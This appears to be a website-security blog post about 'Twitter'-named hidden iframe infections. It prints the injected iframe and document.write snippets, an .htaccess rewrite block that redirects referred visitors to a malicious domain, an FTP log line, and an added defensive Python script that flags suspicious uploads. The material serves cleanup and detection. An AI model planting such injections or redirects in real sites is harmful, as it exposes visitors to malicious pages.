Twitter iframes

Over the past few weeks we’ve cleaned many websites infected with an iframe named Twitter. This iframe has nothing to do with Twitter; that is simply the name the hackers gave it.

It starts out like:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2

where the height and width may be other numbers as well. If this line of code is in a .js (JavaScript) file, it will probably start with:

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2

This type of infection is usually accompanied by code added to the .htaccess files similar to:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://(some malicious domain and querystring goes here) ?h=1459447 [L,R]

We haven’t always seen modified .htaccess files, but generally there will be some “sprinkled” throughout an infected website.

This has been due to compromised login credentials. Many people don’t believe us or don’t want to hear that, but it’s a fact. In every case where we’ve had access to the FTP logs, we see lines like:

Mon Jan 28 09:35:05 2013 0 xxx.xxx.xxx.xxx 239 /home1/(path to website files)/public_html/wp-includes/Text/.htaccess b _ i r user@domain ftp 1 * c

The i (incoming) before the r and the username indicates this file was uploaded to your site. If this log line were from someone downloading a file to their local computer or another location, it would show an o (outgoing) instead.

This log entry shows us that someone at source IP xxx.xxx.xxx.xxx uploaded a file named .htaccess of 239 bytes to this folder using the account user@domain on January 28. When we look at the referenced file, it contains the RewriteRule code listed above. From this we know that a malicious file was uploaded to the site using the username specified. How did this “someone” get that username?
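As an added example that is not from the original post: a small Python script that parses transfer-log (xferlog) lines of the form shown above, flags completed uploads (direction i) of .htaccess files or of anything into wp-includes, and lists the username and source IP pairs whose credentials should be reset. The sample log lines, paths, username and IP addresses are constructed placeholders, and the field layout is assumed to be the standard wu-ftpd/proftpd xferlog format.

```python
from dataclasses import dataclass
# Constructed sample lines in xferlog format (the transfer log of wu-ftpd, proftpd
# and pure-ftpd). The first mirrors the line quoted above; paths, usernames and
# IP addresses are placeholders, not real indicators.
SAMPLE_LOG = """\
Mon Jan 28 09:35:05 2013 0 203.0.113.45 239 /home1/example/public_html/wp-includes/Text/.htaccess b _ i r user@domain ftp 1 * c
Mon Jan 28 09:36:12 2013 1 203.0.113.45 18432 /home1/example/public_html/wp-content/uploads/logo.png b _ i r user@domain ftp 1 * c
Mon Jan 28 10:02:41 2013 0 198.51.100.7 512 /home1/example/public_html/.htaccess b _ o r user@domain ftp 1 * c
Mon Jan 28 10:05:09 2013 0 203.0.113.45 4096 /home1/example/public_html/wp-includes/Text/jquery.js a _ i r user@domain ftp 1 * c
"""
@dataclass
class Transfer:
    when: str
    remote_host: str
    size: int
    path: str
    direction: str  # i = incoming (upload to the server), o = outgoing (download), d = delete
    user: str
    completed: bool

def parse_xferlog_line(line):
    """Parse one xferlog line; returns None for malformed lines.
    Fields: date (5 tokens), transfer-time, remote-host, size, filename, type (a/b),
    special-action, direction (o/i/d), access-mode, username, service, auth-method,
    auth-user-id, completion-status (c/i). The filename is cut from the middle by
    counting fixed fields from both ends, so a path containing spaces still parses."""
    parts = line.split()
    if len(parts) < 18 or not parts[7].isdigit():
        return None
    when, host, size = " ".join(parts[:5]), parts[6], int(parts[7])
    path = " ".join(parts[8:-9])
    direction, user, status = parts[-7], parts[-5], parts[-1]
    return Transfer(when, host, size, path, direction, user, status == "c")

def find_suspicious_uploads(log_text):
    """Completed uploads (direction i) of .htaccess files, or of any file into
    wp-includes, a WordPress core directory that routine FTP work should not write to."""
    hits = []
    for line in log_text.splitlines():
        t = parse_xferlog_line(line)
        if t is None or t.direction != "i" or not t.completed:
            continue
        if t.path.rsplit("/", 1)[-1] == ".htaccess" or "/wp-includes/" in t.path:
            hits.append(t)
    return hits

def accounts_to_reset(hits):
    """Distinct (username, source IP) pairs behind the flagged uploads."""
    return sorted({(t.user, t.remote_host) for t in hits})
```

Run it over a real xferlog by reading the file into `find_suspicious_uploads`; the .htaccess download (direction o) and the image upload into wp-content/uploads in the sample are deliberately left unflagged.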

Most likely from a virus on a computer used to legitimately upload files. Yes, even Macs are susceptible.

We also see from the log files that other backdoors have been uploaded. These have to be found and removed, or your site will get re-infected again and again.

If you’ve fallen victim to this type of infection, please let us know.

Thank you.